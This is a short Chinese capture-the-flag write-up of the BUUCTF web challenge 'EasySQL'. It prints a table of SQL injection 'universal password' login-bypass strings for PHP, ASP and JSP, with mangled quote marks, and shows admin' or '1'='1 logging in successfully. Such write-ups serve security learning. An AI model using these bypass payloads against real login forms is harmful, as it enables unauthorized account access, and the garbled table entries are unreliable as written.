CTF-Web-[极客大挑战2019]EasySQL
博客说明
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
CTP平台
网址
题目
Web类,[极客大挑战2019]EasySQL
打开题目的实例
思路
题目类型是Web类型的,而且是一个登录页面,首先考虑的是否是SQL注入,这里提供一下万能密码表
万能密码表(收集于网络)
语言 | 万能密码 |
---|---|
PHP | ‘or 1=1/ "or “a”=“a "or 1=1– “or”=” “or”="a’=‘a "or1=1– “or=or” ’‘or’=‘or’ ’) or (‘a’=‘a ’.).or.(’.a.’=’.a ’or 1=1 ’or 1=1– 'or 1=1/ ‘or"="a’=‘a ’or’ ‘1’=‘1’ ‘or’’=’ ‘or’’=’‘or’’=’ ‘or’=‘1’ ‘or’=‘or’ 'or.‘a.’=‘a ’or1=1– 1’or’1’=‘1 a’or’ 1=1– a’or’1=1– or ‘a’='a’ or 1=1– or1=1– |
asp aspx | "or “a”="a ’.).or.(’.a.’=’.a or 1=1– ‘or 1=1– a’or’ 1=1– “or 1=1– 'or.‘a.’='a "or”="a’=‘a ’or’’=‘ or’=‘or’ |
jsp | 1’or’1’=‘1 admin’ or 1=1/* |
查看源代码
发现是php写的,于是使用php的万能密码尝试
admin' or '1'='1
拼接的sql语句为
username=admin' or '1'='1&password=admin' or '1'='1
发现已经成功登录
感谢
BUUCTF
以及勤劳的自己